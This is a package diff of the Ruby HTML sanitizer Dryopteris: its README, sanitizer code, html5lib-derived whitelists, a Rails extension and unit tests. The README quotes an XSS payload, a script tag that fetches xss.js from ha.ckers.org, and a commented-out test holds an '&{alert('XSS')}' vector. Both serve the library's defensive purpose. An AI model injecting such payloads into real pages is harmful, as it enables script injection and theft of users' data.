mdalessio-dryopteris 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
data/README.markdown ADDED
@@ -0,0 +1,77 @@
1
+ Dryopteris
2
+ ==========
3
+
4
+ Dryopteris erythrosora is the Japanese Shield Fern. It can also be used to sanitize HTML to help prevent XSS attacks.
5
+
6
+ * [Dryopteris erythrosora](http://en.wikipedia.org/wiki/Dryopteris_erythrosora)
7
+ * [XSS Attacks](http://en.wikipedia.org/wiki/Cross-site_scripting)
8
+
9
+ Usage
10
+ -----
11
+
12
+ Let's say you run a web site, and you allow people to post HTML snippets.
13
+
14
+ Let's also say some script-kiddie from Norland posts this to your site, in an effort to swipe some credit cards:
15
+
16
+ <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
17
+
18
+ Oooh, that could be bad. Here's how to fix it:
19
+
20
+ safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
21
+
22
+ Yeah, it's that easy.
23
+
24
+ In this example, <tt>safe\_html\_snippet</tt> will have all of its __broken markup fixed__ by libxml2, and it will also be completely __sanitized of harmful tags and attributes__. That's twice as clean!
25
+
26
+
27
+ More Usage
28
+ -----
29
+
30
+ You're still here? OK, let me tell you a little something about the two different methods of sanitizing that Dryopteris offers.
31
+
32
+ ### Fragments
33
+
34
+ The first method is for _html fragments_, which are small snippets of markup such as those used in forum posts, emails and homework assignments.
35
+
36
+ Usage is the same as above:
37
+
38
+ safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
39
+
40
+ Generally speaking, unless you expect to have &lt;html&gt; and &lt;body&gt; tags in your HTML, this is the sanitizing method to use.
41
+
42
+ The only real limitation on this method is that the snippet must be a string object. (Support for IO objects was sacrificed at the altar of fixer-uppery-ness. If you need to sanitize data that's coming from an IO object, either a socket or a file, check out the next section on __Documents__.)
43
+
44
+ ### Documents
45
+
46
+ Sometimes you need to sanitize an entire HTML document. (Well, maybe not _you_, but other people, certainly.)
47
+
48
+ safe_html_document = Dryopteris.sanitize_document(dangerous_html_document)
49
+
50
+ The returned string will contain exactly one (1) well-formed HTML document, with all broken HTML fixed and all harmful tags and attributes removed.
51
+
52
+ Coolness: <tt>dangerous\_html\_document</tt> can be a string OR an IO object (a file, or a socket, or ...), which makes it particularly easy to sanitize large numbers of docs.
53
+
54
+
55
+ Standing on the Shoulders of Giants
56
+ -----
57
+
58
+ Dryopteris uses [Nokogiri](http://nokogiri.rubyforge.org/) and [libxml2](http://xmlsoft.org/), so it's fast.
59
+
60
+ Dryopteris also takes its tag and tag-attribute whitelists and its CSS sanitizer directly from [html5lib](http://code.google.com/p/html5lib/).
61
+
62
+
63
+ Authors
64
+ -----
65
+ * [Bryan Helmkamp](http://www.brynary.com/)
66
+ * [Mike Dalessio](http://mike.daless.io/) ([twitter](http://twitter.com/flavorjones))
67
+
68
+
69
+ Quotes About Dryopteris
70
+ -----
71
+
72
+ > "dryopteris shields you from xss attacks using nokogiri and NY attitude"
73
+ > - [hasmanyjosh](http://blog.hasmanythrough.com/)
74
+
75
+ > "I just wanted to say thank you for your dryopteris plugin. It is by far the best sanitization I've found."
76
+ > - [catalystmediastudios](http://github.com/catalystmediastudios)
77
+
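To make the fragment-vs-document distinction in the README above concrete, here is a minimal sketch based only on the API it describes; the forum-post string and the `upload.html` path are hypothetical.

    require 'rubygems'
    require 'dryopteris'

    # Fragments: input must be a String (e.g., a hypothetical forum post).
    post = %q(<p onclick="steal()">hi</p><script src="http://ha.ckers.org/xss.js"></script>)
    puts Dryopteris.sanitize(post)
    # => the onclick attribute is stripped and the <script> element is neutralized

    # Documents: input may be a String or an IO object (file, socket, ...).
    File.open("upload.html") do |io|
      puts Dryopteris.sanitize_document(io)
    end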
data/VERSION.yml ADDED
@@ -0,0 +1,4 @@
1
+ ---
2
+ :major: 0
3
+ :minor: 0
4
+ :patch: 0
data/lib/dryopteris/rails_extension.rb ADDED
@@ -0,0 +1,46 @@
1
+ require "dryopteris"
2
+
3
+ module Dryopteris
4
+ module RailsExtension
5
+ def self.included(base)
6
+ base.extend(ClassMethods)
7
+
8
+ # set up the default behavior: strip tags from all string/text fields before save
9
+ base.class_eval do
10
+ before_save :sanitize_fields
11
+ class_inheritable_reader :dryopteris_options
12
+ end
13
+ end
14
+
15
+ module ClassMethods
16
+ def sanitize_fields(options = {})
17
+ write_inheritable_attribute(:dryopteris_options, {
18
+ :except => (options[:except] || []),
19
+ :allow_tags => (options[:allow_tags] || [])
20
+ })
21
+ end
22
+
23
+ alias_method :sanitize_field, :sanitize_fields
24
+ end
25
+
26
+
27
+ def sanitize_fields
28
+ self.class.columns.each do |column|
29
+ next unless (column.type == :string || column.type == :text)
30
+
31
+ field = column.name.to_sym
32
+ value = self[field]
33
+
34
+ if dryopteris_options && dryopteris_options[:except].include?(field)
35
+ next
36
+ elsif dryopteris_options && dryopteris_options[:allow_tags].include?(field)
37
+ self[field] = Dryopteris.sanitize(value)
38
+ else
39
+ self[field] = Dryopteris.strip_tags(value)
40
+ end
41
+ end
42
+
43
+ end
44
+
45
+ end
46
+ end
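For reference, a minimal sketch of how a Rails model might wire up the extension defined above. The `Comment` model and its column names are hypothetical, and the explicit `include` assumes the module is not mixed into ActiveRecord::Base elsewhere.

    class Comment < ActiveRecord::Base
      include Dryopteris::RailsExtension

      # before_save, every :string/:text column is run through Dryopteris.strip_tags,
      # except :author_name (skipped entirely) and :body (whitelist-sanitized instead).
      sanitize_fields :except => [:author_name], :allow_tags => [:body]
    end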
data/lib/dryopteris/sanitize.rb ADDED
@@ -0,0 +1,135 @@
1
+ require 'rubygems'
2
+ gem 'nokogiri', '>=1.0.5'
3
+ require 'nokogiri'
4
+ require 'cgi'
5
+
6
+ require "dryopteris/whitelist"
7
+
8
+ module Dryopteris
9
+
10
+ class << self
11
+ def strip_tags(string_or_io, encoding=nil)
12
+ return nil if string_or_io.nil?
13
+ return "" if string_or_io.strip.size == 0
14
+
15
+ doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
16
+ body_element = doc.at("/html/body")
17
+ return "" if body_element.nil?
18
+ body_element.inner_text
19
+ end
20
+
21
+ def sanitize(string, encoding=nil)
22
+ return nil if string.nil?
23
+ return "" if string.strip.size == 0
24
+
25
+ string = "<html><body>" + string + "</body></html>"
26
+ doc = Nokogiri::HTML.parse(string, nil, encoding)
27
+ body = doc.xpath("/html/body").first
28
+ return "" if body.nil?
29
+ body.children.each do |node|
30
+ traverse_conditionally_top_down(node, :sanitize_node)
31
+ end
32
+ body.children.map { |x| x.to_xml }.join
33
+ end
34
+
35
+ def sanitize_document(string_or_io, encoding=nil)
36
+ return nil if string_or_io.nil?
37
+ return "" if string_or_io.strip.size == 0
38
+
39
+ doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
40
+ elements = doc.xpath("/html/head/*","/html/body/*")
41
+ return "" if (elements.nil? || elements.empty?)
42
+ elements.each do |node|
43
+ traverse_conditionally_top_down(node, :sanitize_node)
44
+ end
45
+ doc.root.to_xml
46
+ end
47
+
48
+ private
49
+ def traverse_conditionally_top_down(node, method_name)
50
+ return if send(method_name, node)
51
+ node.children.each {|j| traverse_conditionally_top_down(j, method_name)}
52
+ end
53
+
54
+ def remove_tags_from_node(node)
55
+ replacement_killer = Nokogiri::XML::Text.new(node.text, node.document)
56
+ node.add_next_sibling(replacement_killer)
57
+ node.remove
58
+ return true
59
+ end
60
+
61
+ def sanitize_node(node)
62
+ case node.type
63
+ when 1 # Nokogiri::XML::Node::ELEMENT_NODE
64
+ if HashedWhiteList::ALLOWED_ELEMENTS[node.name]
65
+ node.attributes.each do |attr|
66
+ node.remove_attribute(attr.first) unless HashedWhiteList::ALLOWED_ATTRIBUTES[attr.first]
67
+ end
68
+ node.attributes.each do |attr|
69
+ if HashedWhiteList::ATTR_VAL_IS_URI[attr.first]
70
+ # this block lifted nearly verbatim from HTML5 sanitization
71
+ val_unescaped = CGI.unescapeHTML(attr.last.to_s).gsub(/`|[\000-\040\177\s]+|\302[\200-\240]/,'').downcase
72
+ if val_unescaped =~ /^[a-z0-9][-+.a-z0-9]*:/ and HashedWhiteList::ALLOWED_PROTOCOLS[val_unescaped.split(':')[0]].nil?
73
+ node.remove_attribute(attr.first)
74
+ end
75
+ end
76
+ end
77
+ if node.attributes['style']
78
+ node['style'] = sanitize_css(node.attributes['style'])
79
+ end
80
+ return false
81
+ end
82
+ when 3 # Nokogiri::XML::Node::TEXT_NODE
83
+ return false
84
+ when 4 # Nokogiri::XML::Node::CDATA_SECTION_NODE
85
+ return false
86
+ end
87
+ replacement_killer = Nokogiri::XML::Text.new(node.to_s, node.document)
88
+ node.add_next_sibling(replacement_killer)
89
+ node.remove
90
+ return true
91
+ end
92
+
93
+
94
+ # this was lifted nearly verbatim from html5lib
95
+ def sanitize_css(style)
96
+ # disallow urls
97
+ style = style.to_s.gsub(/url\s*\(\s*[^\s)]+?\s*\)\s*/, ' ')
98
+
99
+ # gauntlet
100
+ return '' unless style =~ /^([:,;#%.\sa-zA-Z0-9!]|\w-\w|\'[\s\w]+\'|\"[\s\w]+\"|\([\d,\s]+\))*$/
101
+ return '' unless style =~ /^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$/
102
+
103
+ clean = []
104
+ style.scan(/([-\w]+)\s*:\s*([^:;]*)/) do |prop, val|
105
+ next if val.empty?
106
+ prop.downcase!
107
+ if HashedWhiteList::ALLOWED_CSS_PROPERTIES[prop]
108
+ clean << "#{prop}: #{val};"
109
+ elsif %w[background border margin padding].include?(prop.split('-')[0])
110
+ clean << "#{prop}: #{val};" unless val.split().any? do |keyword|
111
+ HashedWhiteList::ALLOWED_CSS_KEYWORDS[keyword].nil? and
112
+ keyword !~ /^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$/
113
+ end
114
+ elsif HashedWhiteList::ALLOWED_SVG_PROPERTIES[prop]
115
+ clean << "#{prop}: #{val};"
116
+ end
117
+ end
118
+
119
+ style = clean.join(' ')
120
+ end
121
+
122
+ end # self
123
+
124
+ module HashedWhiteList
125
+ # turn each of the whitelist arrays into a hash for faster lookup
126
+ WhiteList.constants.each do |constant|
127
+ next unless WhiteList.module_eval("#{constant}").is_a?(Array)
128
+ module_eval <<-CODE
129
+ #{constant} = {}
130
+ WhiteList::#{constant}.each { |c| #{constant}[c] = true ; #{constant}[c.downcase] = true }
131
+ CODE
132
+ end
133
+ end
134
+
135
+ end
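The private `traverse_conditionally_top_down` helper above drives both `sanitize` and `sanitize_document`: the callback returns true when it has removed or replaced a node (so its children are never visited) and false when the node survives (so traversal descends into it). A standalone sketch of the same pattern, with a hypothetical scrubber that only strips `<script>` elements:

    require 'rubygems'
    require 'nokogiri'

    def traverse_conditionally_top_down(node, &scrubber)
      return if scrubber.call(node)
      node.children.each { |child| traverse_conditionally_top_down(child, &scrubber) }
    end

    doc = Nokogiri::HTML("<div><script>bad()</script><p>keep me</p></div>")
    traverse_conditionally_top_down(doc.at("body")) do |node|
      next false unless node.name == "script"
      # mirror remove_tags_from_node: keep the node's text, drop the element itself
      node.add_next_sibling(Nokogiri::XML::Text.new(node.text, node.document))
      node.remove
      true
    end
    puts doc.at("body").inner_html   # the <script> element is gone; its text remains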
data/lib/dryopteris/whitelist.rb ADDED
@@ -0,0 +1,148 @@
1
+ #
2
+ # HTML whitelist lifted from HTML5 sanitizer code
3
+ # http://code.google.com/p/html5lib/
4
+ #
5
+
6
+ module Dryopteris
7
+ module WhiteList
8
+ # <html5_license>
9
+ #
10
+ # Copyright (c) 2006-2008 The Authors
11
+ #
12
+ # Contributors:
13
+ # James Graham - jg307@cam.ac.uk
14
+ # Anne van Kesteren - annevankesteren@gmail.com
15
+ # Lachlan Hunt - lachlan.hunt@lachy.id.au
16
+ # Matt McDonald - kanashii@kanashii.ca
17
+ # Sam Ruby - rubys@intertwingly.net
18
+ # Ian Hickson (Google) - ian@hixie.ch
19
+ # Thomas Broyer - t.broyer@ltgt.net
20
+ # Jacques Distler - distler@golem.ph.utexas.edu
21
+ # Henri Sivonen - hsivonen@iki.fi
22
+ # The Mozilla Foundation (contributions from Henri Sivonen since 2008)
23
+ #
24
+ # Permission is hereby granted, free of charge, to any person
25
+ # obtaining a copy of this software and associated documentation
26
+ # files (the "Software"), to deal in the Software without
27
+ # restriction, including without limitation the rights to use, copy,
28
+ # modify, merge, publish, distribute, sublicense, and/or sell copies
29
+ # of the Software, and to permit persons to whom the Software is
30
+ # furnished to do so, subject to the following conditions:
31
+ #
32
+ # The above copyright notice and this permission notice shall be
33
+ # included in all copies or substantial portions of the Software.
34
+ #
35
+ # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
36
+ # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
37
+ # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
38
+ # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
39
+ # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
40
+ # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
41
+ # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
42
+ # DEALINGS IN THE SOFTWARE.
43
+ #
44
+ # </html5_license>
45
+
46
+ ACCEPTABLE_ELEMENTS = %w[a abbr acronym address area b big blockquote br
47
+ button caption center cite code col colgroup dd del dfn dir div dl dt
48
+ em fieldset font form h1 h2 h3 h4 h5 h6 hr i img input ins kbd label
49
+ legend li map menu ol optgroup option p pre q s samp select small span
50
+ strike strong sub sup table tbody td textarea tfoot th thead tr tt u
51
+ ul var]
52
+
53
+ MATHML_ELEMENTS = %w[maction math merror mfrac mi mmultiscripts mn mo
54
+ mover mpadded mphantom mprescripts mroot mrow mspace msqrt mstyle msub
55
+ msubsup msup mtable mtd mtext mtr munder munderover none]
56
+
57
+ SVG_ELEMENTS = %w[a animate animateColor animateMotion animateTransform
58
+ circle defs desc ellipse font-face font-face-name font-face-src g
59
+ glyph hkern image linearGradient line marker metadata missing-glyph
60
+ mpath path polygon polyline radialGradient rect set stop svg switch
61
+ text title tspan use]
62
+
63
+ ACCEPTABLE_ATTRIBUTES = %w[abbr accept accept-charset accesskey action
64
+ align alt axis border cellpadding cellspacing char charoff charset
65
+ checked cite class clear cols colspan color compact coords datetime
66
+ dir disabled enctype for frame headers height href hreflang hspace id
67
+ ismap label lang longdesc maxlength media method multiple name nohref
68
+ noshade nowrap prompt readonly rel rev rows rowspan rules scope
69
+ selected shape size span src start style summary tabindex target title
70
+ type usemap valign value vspace width xml:lang]
71
+
72
+ MATHML_ATTRIBUTES = %w[actiontype align columnalign columnalign
73
+ columnalign columnlines columnspacing columnspan depth display
74
+ displaystyle equalcolumns equalrows fence fontstyle fontweight frame
75
+ height linethickness lspace mathbackground mathcolor mathvariant
76
+ mathvariant maxsize minsize other rowalign rowalign rowalign rowlines
77
+ rowspacing rowspan rspace scriptlevel selection separator stretchy
78
+ width width xlink:href xlink:show xlink:type xmlns xmlns:xlink]
79
+
80
+ SVG_ATTRIBUTES = %w[accent-height accumulate additive alphabetic
81
+ arabic-form ascent attributeName attributeType baseProfile bbox begin
82
+ by calcMode cap-height class color color-rendering content cx cy d dx
83
+ dy descent display dur end fill fill-rule font-family font-size
84
+ font-stretch font-style font-variant font-weight from fx fy g1 g2
85
+ glyph-name gradientUnits hanging height horiz-adv-x horiz-origin-x id
86
+ ideographic k keyPoints keySplines keyTimes lang marker-end
87
+ marker-mid marker-start markerHeight markerUnits markerWidth
88
+ mathematical max min name offset opacity orient origin
89
+ overline-position overline-thickness panose-1 path pathLength points
90
+ preserveAspectRatio r refX refY repeatCount repeatDur
91
+ requiredExtensions requiredFeatures restart rotate rx ry slope stemh
92
+ stemv stop-color stop-opacity strikethrough-position
93
+ strikethrough-thickness stroke stroke-dasharray stroke-dashoffset
94
+ stroke-linecap stroke-linejoin stroke-miterlimit stroke-opacity
95
+ stroke-width systemLanguage target text-anchor to transform type u1
96
+ u2 underline-position underline-thickness unicode unicode-range
97
+ units-per-em values version viewBox visibility width widths x
98
+ x-height x1 x2 xlink:actuate xlink:arcrole xlink:href xlink:role
99
+ xlink:show xlink:title xlink:type xml:base xml:lang xml:space xmlns
100
+ xmlns:xlink y y1 y2 zoomAndPan]
101
+
102
+ ATTR_VAL_IS_URI = %w[href src cite action longdesc xlink:href xml:base]
103
+
104
+ ACCEPTABLE_CSS_PROPERTIES = %w[azimuth background-color
105
+ border-bottom-color border-collapse border-color border-left-color
106
+ border-right-color border-top-color clear color cursor direction
107
+ display elevation float font font-family font-size font-style
108
+ font-variant font-weight height letter-spacing line-height overflow
109
+ pause pause-after pause-before pitch pitch-range richness speak
110
+ speak-header speak-numeral speak-punctuation speech-rate stress
111
+ text-align text-decoration text-indent unicode-bidi vertical-align
112
+ voice-family volume white-space width]
113
+
114
+ ACCEPTABLE_CSS_KEYWORDS = %w[auto aqua black block blue bold both bottom
115
+ brown center collapse dashed dotted fuchsia gray green !important
116
+ italic left lime maroon medium none navy normal nowrap olive pointer
117
+ purple red right solid silver teal top transparent underline white
118
+ yellow]
119
+
120
+ ACCEPTABLE_SVG_PROPERTIES = %w[fill fill-opacity fill-rule stroke
121
+ stroke-width stroke-linecap stroke-linejoin stroke-opacity]
122
+
123
+ ACCEPTABLE_PROTOCOLS = %w[ed2k ftp http https irc mailto news gopher nntp
124
+ telnet webcal xmpp callto feed urn aim rsync tag ssh sftp rtsp afs]
125
+
126
+ # subclasses may define their own versions of these constants
127
+ ALLOWED_ELEMENTS = ACCEPTABLE_ELEMENTS + MATHML_ELEMENTS + SVG_ELEMENTS
128
+ ALLOWED_ATTRIBUTES = ACCEPTABLE_ATTRIBUTES + MATHML_ATTRIBUTES + SVG_ATTRIBUTES
129
+ ALLOWED_CSS_PROPERTIES = ACCEPTABLE_CSS_PROPERTIES
130
+ ALLOWED_CSS_KEYWORDS = ACCEPTABLE_CSS_KEYWORDS
131
+ ALLOWED_SVG_PROPERTIES = ACCEPTABLE_SVG_PROPERTIES
132
+ ALLOWED_PROTOCOLS = ACCEPTABLE_PROTOCOLS
133
+
134
+ VOID_ELEMENTS = %w[
135
+ base
136
+ link
137
+ meta
138
+ hr
139
+ br
140
+ img
141
+ embed
142
+ param
143
+ area
144
+ col
145
+ input
146
+ ]
147
+ end
148
+ end
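These arrays are what the `HashedWhiteList` module in sanitize.rb converts into hashes, so that `sanitize_node` can test membership with a constant-time key lookup rather than scanning an array. Roughly, the generated code is equivalent to this hand-written sketch (shown for `ALLOWED_ELEMENTS` only):

    require 'dryopteris'

    allowed_elements = {}
    Dryopteris::WhiteList::ALLOWED_ELEMENTS.each do |name|
      allowed_elements[name] = true            # original casing (e.g., "animateColor")
      allowed_elements[name.downcase] = true   # plus a downcased alias
    end

    allowed_elements["div"]     # => true
    allowed_elements["script"]  # => nil, so sanitize_node escapes the node instead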
data/lib/dryopteris.rb ADDED
@@ -0,0 +1,7 @@
1
+ $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__))) unless $LOAD_PATH.include?(File.expand_path(File.dirname(__FILE__)))
2
+
3
+ require "dryopteris/sanitize"
4
+
5
+ module Dryopteris
6
+ VERSION = '0.1'
7
+ end
data/test/helper.rb ADDED
@@ -0,0 +1,2 @@
1
+ require 'test/unit'
2
+ require File.expand_path(File.join(File.dirname(__FILE__), "..", "lib", "dryopteris"))
data/test/test_basic.rb ADDED
@@ -0,0 +1,66 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class TestBasic < Test::Unit::TestCase
4
+
5
+ def test_nil
6
+ assert_nil Dryopteris.sanitize(nil)
7
+ end
8
+
9
+ def test_empty_string
10
+ assert_equal "", Dryopteris.sanitize("")
11
+ end
12
+
13
+ def test_removal_of_illegal_tag
14
+ html = <<-HTML
15
+ following this there should be no jim tag
16
+ <jim>jim</jim>
17
+ was there?
18
+ HTML
19
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
20
+ assert sane.xpath("//jim").empty?
21
+ end
22
+
23
+ def test_removal_of_illegal_attribute
24
+ html = "<p class=bar foo=bar abbr=bar />"
25
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
26
+ node = sane.xpath("//p").first
27
+ assert node.attributes['class']
28
+ assert node.attributes['abbr']
29
+ assert_nil node.attributes['foo']
30
+ end
31
+
32
+ def test_removal_of_illegal_url_in_href
33
+ html = <<-HTML
34
+ <a href='jimbo://jim.jim/'>this link should have its href removed because of illegal url</a>
35
+ <a href='http://jim.jim/'>this link should be fine</a>
36
+ HTML
37
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
38
+ nodes = sane.xpath("//a")
39
+ assert_nil nodes.first.attributes['href']
40
+ assert nodes.last.attributes['href']
41
+ end
42
+
43
+ def test_css_sanitization
44
+ html = "<p style='background-color: url(\"http://foo.com/\") ; background-color: #000 ;' />"
45
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
46
+ assert_match(/#000/, sane.inner_html)
47
+ assert_no_match(/foo\.com/, sane.inner_html)
48
+ end
49
+
50
+ def test_fragment_with_no_tags
51
+ assert_equal "This fragment has no tags.", Dryopteris.sanitize("This fragment has no tags.")
52
+ end
53
+
54
+ def test_fragment_in_p_tag
55
+ assert_equal "<p>This fragment is in a p.</p>", Dryopteris.sanitize("<p>This fragment is in a p.</p>")
56
+ end
57
+
58
+ def test_fragment_in_a_nontrivial_p_tag
59
+ assert_equal " \n<p>This fragment is in a p.</p>", Dryopteris.sanitize(" \n<p foo='bar'>This fragment is in a p.</p>")
60
+ end
61
+
62
+ def test_fragment_in_p_tag_plus_stuff
63
+ assert_equal "<p>This fragment is in a p.</p>foo<strong>bar</strong>", Dryopteris.sanitize("<p>This fragment is in a p.</p>foo<strong>bar</strong>")
64
+ end
65
+
66
+ end
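The `test_css_sanitization` case above exercises `sanitize_css` indirectly through the `style` attribute; at the API level the behavior it pins down looks roughly like this (the markup is hypothetical):

    require 'dryopteris'

    html = %q(<p style='background-image: url("http://evil.example/x.png"); color: #000;'>hi</p>)
    Dryopteris.sanitize(html)
    # => roughly <p style="color: #000;">hi</p>
    #    the url(...) declaration is dropped, while "color" survives because it
    #    is listed in ALLOWED_CSS_PROPERTIES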
data/test/test_sanitizer.rb ADDED
@@ -0,0 +1,141 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class SanitizeTest < Test::Unit::TestCase
4
+ include Dryopteris
5
+
6
+ def sanitize_html stream
7
+ Dryopteris.sanitize(stream)
8
+ end
9
+
10
+ def sanitize_doc stream
11
+ Dryopteris.sanitize_document(stream)
12
+ end
13
+
14
+ def check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
15
+ # libxml uses double-quotes, so let's swappo-boppo our quotes before comparing.
16
+ assert_equal htmloutput, sanitize_html(input).gsub(/"/,"'"), input
17
+
18
+ doc = sanitize_doc(input).gsub(/"/,"'")
19
+ assert doc.include?(htmloutput), "#{input}:\n#{doc}\nshould include:\n#{htmloutput}"
20
+ end
21
+
22
+ WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
23
+ define_method "test_should_allow_#{tag_name}_tag" do
24
+ input = "<#{tag_name} title='1'>foo <bad>bar</bad> baz</#{tag_name}>"
25
+ htmloutput = "<#{tag_name.downcase} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name.downcase}>"
26
+ xhtmloutput = "<#{tag_name} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name}>"
27
+ rexmloutput = xhtmloutput
28
+
29
+ ##
30
+ ## these special cases are HTML5-tokenizer-dependent.
31
+ ## libxml2 cleans up HTML differently, and I trust that.
32
+ ##
33
+ # if %w[caption colgroup optgroup option tbody td tfoot th thead tr].include?(tag_name)
34
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
35
+ # xhtmloutput = htmloutput
36
+ # elsif tag_name == 'col'
37
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
38
+ # xhtmloutput = htmloutput
39
+ # rexmloutput = "<col title='1' />"
40
+ # elsif tag_name == 'table'
41
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt;baz<table title='1'> </table>"
42
+ # xhtmloutput = htmloutput
43
+ # elsif tag_name == 'image'
44
+ # htmloutput = "<image title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
45
+ # xhtmloutput = htmloutput
46
+ # rexmloutput = "<image title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</image>"
47
+ if WhiteList::VOID_ELEMENTS.include?(tag_name)
48
+ if Nokogiri::LIBXML_VERSION <= "2.6.16"
49
+ htmloutput = "<#{tag_name} title='1'/><p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
50
+ else
51
+ htmloutput = "<#{tag_name} title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
52
+ end
53
+ xhtmloutput = htmloutput
54
+ # htmloutput += '<br/>' if tag_name == 'br'
55
+ rexmloutput = "<#{tag_name} title='1' />"
56
+ end
57
+ check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
58
+ end
59
+ end
60
+
61
+ ##
62
+ ## libxml2 downcases tag names as it parses, so this is unnecessary.
63
+ ##
64
+ # WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
65
+ # define_method "test_should_forbid_#{tag_name.upcase}_tag" do
66
+ # input = "<#{tag_name.upcase} title='1'>foo <bad>bar</bad> baz</#{tag_name.upcase}>"
67
+ # output = "&lt;#{tag_name.upcase} title=\"1\"&gt;foo &lt;bad&gt;bar&lt;/bad&gt; baz&lt;/#{tag_name.upcase}&gt;"
68
+ # check_sanitization(input, output, output, output)
69
+ # end
70
+ # end
71
+
72
+ WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
73
+ next if attribute_name == 'style'
74
+ next if attribute_name =~ /:/ && Nokogiri::LIBXML_VERSION <= '2.6.16'
75
+ define_method "test_should_allow_#{attribute_name}_attribute" do
76
+ input = "<p #{attribute_name}='foo'>foo <bad>bar</bad> baz</p>"
77
+ output = "<p #{attribute_name}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
78
+ htmloutput = "<p #{attribute_name.downcase}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
79
+ check_sanitization(input, htmloutput, output, output)
80
+ end
81
+ end
82
+
83
+ ##
84
+ ## libxml2 downcases attributes as it parses, so this is unnecessary.
85
+ ##
86
+ # WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
87
+ # define_method "test_should_forbid_#{attribute_name.upcase}_attribute" do
88
+ # input = "<p #{attribute_name.upcase}='display: none;'>foo <bad>bar</bad> baz</p>"
89
+ # output = "<p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
90
+ # check_sanitization(input, output, output, output)
91
+ # end
92
+ # end
93
+
94
+ WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
95
+ define_method "test_should_allow_#{protocol}_uris" do
96
+ input = %(<a href="#{protocol}">foo</a>)
97
+ output = "<a href='#{protocol}'>foo</a>"
98
+ check_sanitization(input, output, output, output)
99
+ end
100
+ end
101
+
102
+ WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
103
+ define_method "test_should_allow_uppercase_#{protocol}_uris" do
104
+ input = %(<a href="#{protocol.upcase}">foo</a>)
105
+ output = "<a href='#{protocol.upcase}'>foo</a>"
106
+ check_sanitization(input, output, output, output)
107
+ end
108
+ end
109
+
110
+ if Nokogiri::LIBXML_VERSION > '2.6.16'
111
+ def test_should_handle_astral_plane_characters
112
+ input = "<p>&#x1d4b5; &#x1d538;</p>"
113
+ output = "<p>\360\235\222\265 \360\235\224\270</p>"
114
+ check_sanitization(input, output, output, output)
115
+
116
+ input = "<p><tspan>\360\235\224\270</tspan> a</p>"
117
+ output = "<p><tspan>\360\235\224\270</tspan> a</p>"
118
+ check_sanitization(input, output, output, output)
119
+ end
120
+ end
121
+
122
+ # This affects only NS4. Is it worth fixing?
123
+ # def test_javascript_includes
124
+ # input = %(<div size="&{alert('XSS')}">foo</div>)
125
+ # output = "<div>foo</div>"
126
+ # check_sanitization(input, output, output, output)
127
+ # end
128
+
129
+ #html5_test_files('sanitizer').each do |filename|
130
+ # JSON::parse(open(filename).read).each do |test|
131
+ # define_method "test_#{test['name']}" do
132
+ # check_sanitization(
133
+ # test['input'],
134
+ # test['output'],
135
+ # test['xhtml'] || test['output'],
136
+ # test['rexml'] || test['output']
137
+ # )
138
+ # end
139
+ # end
140
+ #end
141
+ end
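Each `define_method` loop above generates one conventional test per whitelist entry; for example, the generated `test_should_allow_http_uris` is roughly equivalent to writing this by hand:

    def test_should_allow_http_uris
      input  = %(<a href="http">foo</a>)
      output = "<a href='http'>foo</a>"
      check_sanitization(input, output, output, output)
    end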
data/test/test_strip_tags.rb ADDED
@@ -0,0 +1,35 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class TestStripTags < Test::Unit::TestCase
4
+
5
+ def test_nil
6
+ assert_nil Dryopteris.strip_tags(nil)
7
+ end
8
+
9
+ def test_empty_string
10
+ assert_equal "", Dryopteris.strip_tags("")
11
+ end
12
+
13
+ def test_return_empty_string_when_nothing_left
14
+ assert_equal "", Dryopteris.strip_tags('<script>test</script>')
15
+ end
16
+
17
+ def test_removal_of_all_tags
18
+ html = <<-HTML
19
+ What's up <strong>doc</strong>?
20
